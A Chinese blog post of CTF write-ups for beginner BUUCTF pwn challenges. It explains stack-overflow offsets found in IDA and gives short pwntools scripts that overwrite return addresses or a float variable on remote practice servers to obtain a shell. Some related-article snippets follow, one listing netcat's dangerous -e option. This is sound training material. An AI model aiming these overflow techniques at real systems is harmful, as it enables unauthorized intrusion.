buuctf pwn wp(第一波)无脑AAAA系列

最新推荐文章于 2024-05-07 16:02:29 发布
最新推荐文章于 2024-05-07 16:02:29 发布
阅读量1k 收藏 3
点赞数 2
分类专栏: CTF pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43847969/article/details/104989607
版权
CTF 同时被 2 个专栏收录
22 篇文章 1 订阅
订阅专栏
pwn
15 篇文章 0 订阅
订阅专栏

这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第一波,都是最简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理。)
这一波题都是无脑AAAA的类型,它们的区别主要就是打入多少个填充字符A的区别,(还有接受到什么字符串的区别),反正都是最简单的一类题。
另外声明,脚本有些来自于网络上,但是我做了有一会儿了(这篇文章是我把当初做了时的记录素材拿过来做的),所以有些脚本拿的谁的我给忘了(不过这么简单的脚本应该没有大佬介意)等到后面稍微难一点的题目接近我现在的时间线,一般都是标注是参考谁的wp的

文章目录

test_your_nc

直接nc 然后 cat flag就好了
在这里插入图片描述

others_shellcode

连上去就有flag
在这里插入图片描述

warmup_csaw_2016

这个跟攻防世界的一题叫warmup的是一样的,只不过攻防世界那个没有给附件,是盲打的。
看见有gets的漏洞,然后点开v5

在这里插入图片描述
看到有0x40个空间,直接栈溢出打进去4*16+8=72个填充字符,然后加上system地址就好了
在这里插入图片描述
很贴心的已经给了
在这里插入图片描述
在这里插入图片描述

#!/usr/bin/python
from pwn import *

r = remote('node3.buuoj.cn', 25644)

r.recvuntil('WOW:')
address =0x000000000040060D
payload = 'A' * 72 + p64(address)

r.writeline(payload)

r.interactive()

在这里插入图片描述

ciscn_2019_n_1

先nc一下,然后checksec,(截图就省略了)
总之是64位的程序,然后扔进IDA
在这里插入图片描述
没什么东西,直接点开func()
在这里插入图片描述
看到了flag和条件,让v2=11.28125,然后还有一个gets漏洞,我们直接看v1
在这里插入图片描述
在这里
在这里插入图片描述
然后v2在这里
在这里插入图片描述
我们可以通过向v1填充字符利用栈溢出改变v2的值,让他变成11.28125
我们把两者的位置相减得到3*16-4=44=0x2C(这里不加4是因为不是函数,不需要覆盖返回地址)
在这里插入图片描述
-----------------------------------8.26修改(这里有人问我0x41348000是什么,我很久之后都忘了这是什么了,还以为是shell,后来发现这是11.28125的浮点数转换成16进制,这里我没有讲清楚)


from pwn import *

r=remote('node3.buuoj.cn',21699)

payload='a'*0x2c+p64(0x41348000)
r.recvuntil("Let's guess the number.")
r.sendline(payload)

r.interactive()

rip

from pwn import*
sh=remote('node3.buuoj.cn',26183)
payload='a'*23+p64(0x401186)
sh.sendline(payload)
sh.interactive()
月阴荒
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[CTF-PWN]攻防世界新手村-hello_pwn[wp]
murongxuege的博客
10-01 2551
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 396
buuctf-pwn 001-016题wp
刷题 - BUUCTF(BUUOJ) - PWN - DAY3
qq_36902977的博客
08-02 143
buuoj/buuctf pwn 刷题
others_shellcode[BUUCTF]
最新发布
moonlightsunshin的博客
05-07 504
在 x86 架构的 32 位模式下,int 0x80 是一个软件中断指令,用于从用户空间调用内核空间的服务,即 Linux 系统调用。这个指令会触发一个异常,将控制权传递给内核的异常处理程序,该程序会解析由用户空间代码设置的系统调用号和参数,并执行相应的内核服务。然而,需要注意的是,在 x86-64(也称为 AMD64)架构的 64 位模式下,Linux 采用了不同的系统调用机制。寄存器中,参数则根据系统调用的不同而有所变化,但通常也会存储在寄存器中。指令时,系统调用号通常存储在。寄存器,将参数按照约。
[BUUCTF-pwn]——others_shellcode
Y_peak的博客
02-12 1130
[BUUCTF-pwn]——others_shellcode 题目地址: https://buuoj.cn/challenges#others_shellcode peak 小知识 写这道题之前, 大家首先要了解, 想要获得一个shell, 除了system("/bin/sh") 以外, 还有一种更好的方法, 就是系统调用中的 execve("/bin/sh", NULL, NULL)获得shell。我们可以在 Linxu系统调用号表 中找到对应的系统调用号,进行调用, 其中系统调用号用 eax 储存
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4916
BUU CTF PWN 入门知识详解
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
PWM.zip_51pwm控制LED_51控制pwn_PWN_pwm中断_pwn呼吸灯设计
09-14
PWM,即脉宽调制(Pulse Width Modulation),是一种常用的技术,用于通过改变信号的高电平时间比例来调节输出功率或模拟信号。在51单片机中,PWM常用于控制LED亮度、电机速度以及其他模拟信号的输出。本教程主要...
PWN不欢沙龙演讲PPT.rar
05-20
"无PWN不欢"这个标题暗示了我们即将探讨的是关于网络安全中的PWNPwnage)领域。在黑客竞赛和网络安全研究中,PWN通常指的是攻破目标系统或软件的过程,它涵盖了缓冲区溢出、类型混淆、整数溢出等各种漏洞利用技术...
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
攻防世界hello pwn WPpwn入门基础题)
m0_62584974的博客
11-21 2037
攻防世界hello pwn WPpwn入门基础题)的简单讲解
2022强网杯pwn部分wp
N1rvana的博客
08-02 1494
2022强网杯pwn
祥云杯部分pwnwp
eeeeeight的博客
08-24 1224
lemon 主要问题是2.26版本下, 未控制好指针导致任意写 数据结构如下: lemon_name: lemon_content: 主要可利用的函数是color: 里的buf是指lemon_name结构, 所以可以控制指针lemon_addr的指向了, 因为只能用一次所以想控制整个tcache结构 其它一点可利用的函数: 开头的一次welcome: 虽然是有rand, 但无随机数种子, 所以是固定值, z3一把????! eat函数: 可以打印chunkaddr第四字节, 用于配合后面分配堆块 整
(buuctf) - pwn入门部分wp - rip -- pwn1_sctf_2016
J1ayの博客
09-10 1417
⭐ 【buuctfpwn入门 pwn学习之路引入 栈溢出引入 ⭐test_your_nc 【题目链接】 注意到 Ubuntu 18, Linux系统 。 nc 靶场 nc node3.buuoj.cn 25677 【注】 nc命令详解 -c shell命令为“-e”;使用/bin/sh来执行 [危险] -e 文件名程序在连接后执行 [危险] -b 允许广播 -g 网关源路由跃点,最多8个 -G num源路由指针:4,8,12。。。 -i secs 发送的线
BUUCTF PWN部分题目wp
awxnutpgs545144602的博客
08-16 2004
pwn好难啊 PWN 1,连上就有flag的pwnnc buuoj.cn 6000得到flag 2,RIP覆盖一下用ida分析一下,发现已有了system,只需覆盖RIP为fun()的地址,用peda计算偏移为23,写脚本 from pwn import* sh=remote('f.b...
BUU PWN(一)
playmaker的博客
01-28 2102
test_your_nc 连上即可拿到shell rip from pwn import * context.log_level='debug' #p=process('./17pwn1') p=remote("node3.buuoj.cn","26137") p.recvuntil("please input\n") payload='a'*0xf+'a'*8+p64(0x401186) p.s...
BUUCTF pwn ez_pz_hackover_2016
菜的只能随便写写博客
02-21 2340
0x01 文件分析  没有不可执行栈和段上的读写保护,可以做到很多事情。   0x02 运行  输入name并且回显,上面还有一个地址。   0x03 IDA  主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写入shellcode,之后的vuln函数会将s的数据复制到vuln的栈上面,但是复制的数据量远远大于栈的长度,会造成栈溢出。  并且此函数的栈的地址直接打印出来,不用再去...
2020-11-15 UNCTF部分pwnwp
eeeeeight的博客
11-15 310
第一题:     直接用pwn里的recv( )就行了 do you like me:     直接覆盖到ip返回地址就好了 #!/usr/bin/env python # coding=utf-8 from pwn import * sh=remote('node2.hackingfor.fun',36806) #sh=process('./like') sh.recv() sh.sendline(p64(0)*3+p64(0
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值